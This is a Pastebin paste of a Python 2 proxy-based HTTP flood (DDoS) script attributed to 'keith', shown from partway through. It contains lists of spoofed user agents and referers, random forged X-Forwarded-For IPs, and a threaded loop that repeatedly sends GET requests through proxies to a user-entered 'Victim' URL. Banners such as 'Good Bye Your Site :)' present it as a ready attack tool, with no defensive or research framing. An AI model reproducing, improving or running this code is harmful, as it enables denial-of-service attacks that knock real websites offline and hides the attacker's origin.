 351.         "Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413"
 352.         "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
 353.         "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)"
 354.         "Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0"
 355.         "Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)"
 356.         "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125"
 357.         "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)"
 358.         "Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413"
 359.         "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)"
 360.         "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"
 361.         "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)"
 362.         "Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)"
 363.         "Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)"
 364.         "Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10"
 365.         "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4"
 366.         "Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0"
 367.         "Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10"
 368.         "Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)"
 369.         "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
 370.         "Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
 371.         "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
 372.         "Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16"
 373.         "Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1"
 374.         "Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)"
 375.         "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51"
 376.         "Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)"
 377.         "Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)"
 378.         "Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7"
 379.         "BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0"
 380.         "Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)"
 381.         "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
 382.         "Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)"
 383.       "Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10"
 384.       "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
 385.       "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
 386.       "BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179"
 387.       "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
 388.       "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
 389.       "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5"
 390.       "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5"
 391.       "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3"
 392.       "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0"
 393.       "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0"
 394.       "Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0"
 395.       "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101  Firefox/28.0"
 396.       "Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3"
 397.       "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0"
 398.       "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"
 399.       "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))"
 400.       "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"
 401.       "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)"
 402.       "Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)",
 403.       "Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00"
 404.       "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14"
 405.       "Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14"
 406.       "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14"
 407.       "Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02"
 408.       "Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00"
 409.       "Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00"
 410.       "Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)"
 411.       "HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)"
 412.       "Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)",
 413.       "Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+",
 414.       "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+",
 415.       "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.115 Mobile Safari/534.11+",
 416.       "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+",
 417.       "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7",
 418.       "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5",
 419.       "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25",
 420.       "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
 421.       "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10",
 422.       "Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3",
 423.       "Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
 424.       "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
 425.       "facebookexternalhit/1.0 (+http://www.facebook.com/externalhit_uatext.php)"
 426.       "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
 427.       "Mozilla/5.0 (compatible; SMTBot/1.0; +http://www.similartech.com/smtbot)"
 428.       "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
 429.       "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
 430.       "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
 431.       "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 432.       "Mozilla/5.0 (compatible; spbot/4.4.2; +http://OpenLinkProfiler.org/bot )"
 433.       "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1; 360Spider(compatible; HaosouSpider; http://www.haosou.com/help/help_3_2.html)",
 434.       "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
 435.       "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Applebot/0.1; +http://www.apple.com/go/applebot)",
 436.       "Mozilla/5.0 (compatible; coccoc/1.0; +http://help.coccoc.com/)"
 437.       "Mozilla/5.0 (compatible; SEOdiver/1.0; +http://www.seodiver.com/bot)"
 438.       "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
 439.       "Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)"
 440.       "Mozilla/5.0 (compatible; Mp3Bot/0.7; +http://mp3realm.org/mp3bot/)"
 441.       "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
 442.       "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
 443.       "Mozilla/5.0 (compatible; SecretSerachEngineLabs.com-SBSearch/0.9; http://www.secretsearchenginelabs.com/secret-web-crawler.php)",
 444.       "Googlebot-Image/1.0 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
 445.       "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search",
 446.       "Mozilla/5.0 (Linux;u;Android 2.3.7;zh-cn;) AppleWebKit/533.1 (KHTML,like Gecko) Version/4.0 Mobile Safari/533.1 (compatible; +http://www.baidu.com/search/spider.html)",
 447.       "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
 448.       "Mozilla/5.0 (compatible; Sosoimagespider/2.0; +http://help.soso.com/soso-image-spider.htm)"
 449.       "Sosospider+(+http://help.soso.com/webspider.htm)"
 450.       "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
 451.       "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0"
 452.       "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html;"
 453.       "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (FlipboardProxy/1.1; "]
 454.  
 455. reFerers = [
 456.         "http://host-tracker.com/check_page/?furl="
 457.         "http://jigsaw.w3.org/css-validator/validator?uri="
 458.         "http://www.google.com/translate?u="
 459.         "http://anonymouse.org/cgi-bin/anon-www.cgi/"
 460.         "http://www.onlinewebcheck.com/?url="
 461.         "http://feedvalidator.org/check.cgi?url="
 462.         "http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL="
 463.         "http://www.translate.ru/url/translation.aspx?direction=er&sourceURL="
 464.         "http://validator.w3.org/feed/check.cgi?url="
 465.         "http://www.pagescoring.com/website-speed-test/?url="
 466.         "http://check-host.net/check-http?host="
 467.         "http://checksite.us/?url="
 468.         "http://jobs.bloomberg.com/search?q="
 469.         "http://www.bing.com/search?q="
 470.         "https://www.yandex.com/yandsearch?text="
 471.         "http://www.google.com/?q="
 472.         "https://add.my.yahoo.com/rss?url="
 473.         "http://www.bestbuytheater.com/events/search?q="
 474.         "http://www.shodanhq.com/search?q="
 475.         "https://play.google.com/store/search?q="
 476.         "http://coccoc.com/search#query="
 477.  "https://w...content-available-to-author-only...m.vn/?gws_rd=ssl#q=",
 478.         "http://y...content-available-to-author-only...x.ru/yandsearch?text=%D1%%D2%?=g.sql()81%..",
 479.         "http://content-available-to-author-only.com/profile.php?redirect=",
 480.         "http://w...content-available-to-author-only...y.com/search/results?q=",
 481.         "http://y...content-available-to-author-only...x.ru/yandsearch?text=",
 482.         "http://g...content-available-to-author-only...l.ru/search?mail.ru=1&q=",
 483.         "http://n...content-available-to-author-only...r.ru/search?=btnG?=%D0?2?%D0?2?%=D0..",
 484.         "http://r...content-available-to-author-only...a.org/wiki/%D0%9C%D1%8D%D1%x80_%D0%..",
 485.         "http://r...content-available-to-author-only...o.com/search;_yzt=?=A7x9Q.bs67zf..",
 486.         "http://r...content-available-to-author-only...o.com/search;?_query?=l%t=?=?A7x..",
 487.         "http://g...content-available-to-author-only...l.ru/search?gay.ru.query=1&q=?abc.r..",
 488.         "http://n...content-available-to-author-only...r.ru/search?btnG=%D0%9D%?D0%B0%D0%B..",
 489.         "http://w...content-available-to-author-only...e.ru/url?sa=t&rct=?j&q=&e..",
 490.         "http://h...content-available-to-author-only...u.com/searchResult?keywords=",
 491.         "http://w...content-available-to-author-only...g.com/search?q=",
 492.         "https://w...content-available-to-author-only...x.com/yandsearch?text=",
 493.         "https://d...content-available-to-author-only...o.com/?q=",
 494.         "http://w...content-available-to-author-only...k.com/web?q=",
 495.         "http://s...content-available-to-author-only...l.com/aol/search?q=",
 496.         "https://w...content-available-to-author-only...m.nl/vaste-onderdelen/zoeken/?zoeken_term=",
 497.         "http://v...content-available-to-author-only...3.org/feed/check.cgi?url=",
 498.         "http://h...content-available-to-author-only...r.com/check_page/?furl=",
 499.         "http://w...content-available-to-author-only...r.com/url/translation.aspx?direction=er&sourceURL=",
 500.         "http://j...content-available-to-author-only...3.org/css-validator/validator?uri=",
 501.         "https://a...content-available-to-author-only...o.com/rss?url=",
 502.         "http://e...content-available-to-author-only...l.com/search?q=",
 503.         "https://s...content-available-to-author-only...y.com/market/search?q=",
 504.         "http://f...content-available-to-author-only...o.com/search?q=",
 505.         "http://w...content-available-to-author-only...t.com/site/pinterest.com/search?q=",
 506.         "http://e...content-available-to-author-only...e.net/wow/en/search?q=",
 507.         "http://e...content-available-to-author-only...l.com/search?q=",
 508.         "http://c...content-available-to-author-only...n.org/search?q=",
 509.         "http://t...content-available-to-author-only...t.edu/search?q=",
 510.         "http://w...content-available-to-author-only...m.tv/search?q=",
 511.         "http://w...content-available-to-author-only...d.com/search?q=",
 512.         "http://f...content-available-to-author-only...a.com/search?q=",
 513.         "http://i...content-available-to-author-only...h.io/search?q=",
 514.         "http://j...content-available-to-author-only...s.com/jobs/search?q=",
 515.         "http://t...content-available-to-author-only...p.org/search?q=",
 516.         "http://w...content-available-to-author-only...m.vn/news/vn/search&q=",
 517.         "https://play.google.com/store/search?q=",
 518.         "http://w...content-available-to-author-only...s.gov/@@tceq-search?q=",
 519.         "http://w...content-available-to-author-only...t.com/search?q=",
 520.         "http://w...content-available-to-author-only...r.com/events/search?q=",
 521.         "https://c...content-available-to-author-only...e.org/search?q=",
 522.         "http://j...content-available-to-author-only...s.com/search?q=",
 523.         "http://j...content-available-to-author-only...g.com/search?q=",
 524.         "https://w...content-available-to-author-only...t.com/search/?q=",
 525.         "http://m...content-available-to-author-only...r.org/search?q=",
 526.         "https://w...content-available-to-author-only...s.com/search?q=",
 527.         "http://w...content-available-to-author-only...s.uk/search?q=",
 528.         "http://w...content-available-to-author-only...q.com/search?q="
 529.         "http://www.search.com/search?q="
 530.         "https://add.my.yahoo.com/rss?url="
 531.         "https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?container=focus&url="
 532.         "https://www.facebook.com/l.php?u=",
 533.         "https://www.facebook.com/l.php?u=",
 534.         "https://drive.google.com/viewerng/viewer?url=",
 535.         "http://www.google.com/translate?u=",
 536.         "http://downforeveryoneorjustme.com/",
 537.         "http://www.slickvpn.com/go-dark/browse.php?u=",
 538.         "https://www.megaproxy.com/go/_mp_framed?",
 539.         "http://scanurl.net/?u=",
 540.         "http://www.isup.me/",
 541.         "http://check-host.net/check-tcp?host=",
 542.         "http://check-host.net/check-dns?host=",
 543.         "http://check-host.net/check-ping?host=",
 544.         "http://www.currentlydown.com/",
 545.         "http://check-host.net/check-ping?host=",
 546.         "http://check-host.net/check-tcp?host=",
 547.         "http://check-host.net/check-dns?host=",
 548.         "http://check-host.net/ip-info?host=",
 549.         "https://safeweb.norton.com/report/show?url=",
 550.         "http://www.webproxy.net/view?q=",
 551.         "http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=",
 552.         "https://anonysurfer.com/a2/index.php?q=",
 553.         "http://analiz.web.tr/en/www/",
 554.         "https://plus.google.com/share?url="]
 555.  
 556. def randomIp():
 557.     random.seed()
 558.     result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.'
 559.     result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254))
 560.     return result
 561.  
 562. def randomIpList():
 563.     random.seed()
 564.     res = ""
 565.     for ip in xrange(random.randint(2, 8)):
 566.         res = res + randomIp() + ", "
 567.     return res[0:len(res) - 2]
 568.  
 569. def randomUserAgent():
 570.     return random.choice(userAgents)
 571.  
 572. def randomReFerer():
 573.     return random.choice(reFerers)  
 574.  
 575. class attacco(threading.Thread):
 576.     def run(self):
 577.         current = x
 578.        
 579.         if current < len(listaproxy):
 580.             proxy = listaproxy[current].split(':')
 581.         else:
 582.             proxy = random.choice(listaproxy).split(':')
 583.  
 584.         useragent = "User-Agent: " + randomUserAgent() + "\r\n"
 585.         forward   = "X-Forwarded-For: " + randomIpList() + "\r\n"
 586.         referer   = "Referer: "+ randomReFerer() + url + "?r="+ str(random.randint(1, 5000)) + "\r\n"
 587.         httprequest = get_host + useragent + referer + accept + forward + connection + "\r\n"
 588.  
 589.         while nload:
 590.             time.sleep(1)
 591.            
 592.         while 1:
 593.             try:
 594.                 a = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 595.                 a.connect((proxy[0], int(proxy[1])))
 596.                 a.send(httprequest)
 597.                 try:
 598.                     for i in xrange(5):
 599.                         a.send(httprequest)
 600.                 except:
 601.                     tts = 2
 602.                    
 603.             except:
 604.                 proxy = random.choice(listaproxy).split(':')
 605.  
 606.  
 607.  
 608. #Main
 609. print("        .----. Code By keith  .----.        ")                          
 610. print("»------(.:.This tool need Proxy list (so much proxy) =]].:.)------»")
 611. print(">----------------------Edit and Update----------------------<")
 612. print(">------------Proxy DDos By keith------------------<")
 613. # Site
 614. url = raw_input("Victim(htttp://www.victim.com): ")
 615.  
 616. host_url = url.replace("http://", "").replace("https://", "").split('/')[0]
 617.  
 618. #Proxy
 619. in_file = open(raw_input("File proxy(proxy.txt): "),"r")
 620. proxyf = in_file.read()
 621. in_file.close()
 622.  
 623. listaproxy = proxyf.split('\n')
 624. #So luong 1
 625. thread = input("Number Proxy using(5000): ")
 626. get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n"
 627. accept = "Accept-Encoding: gzip, deflate\r\n"
 628. connection = "Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n"
 629. nload = 1
 630. x = 0
 631. for x in xrange(thread):
 632.     attacco().start()
 633.  
 634. print "Dang tan cong..."
 635. print "Code By keith..."
 636. print "Good Bye Your Site :)"
 637. print "I Am AnonKeithHillary..."
 638. print "My Facebook : fb.com/hillary.keith.77"
 639. nload = 0
 640. while not nload:
 641.     time.sleep(1)
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top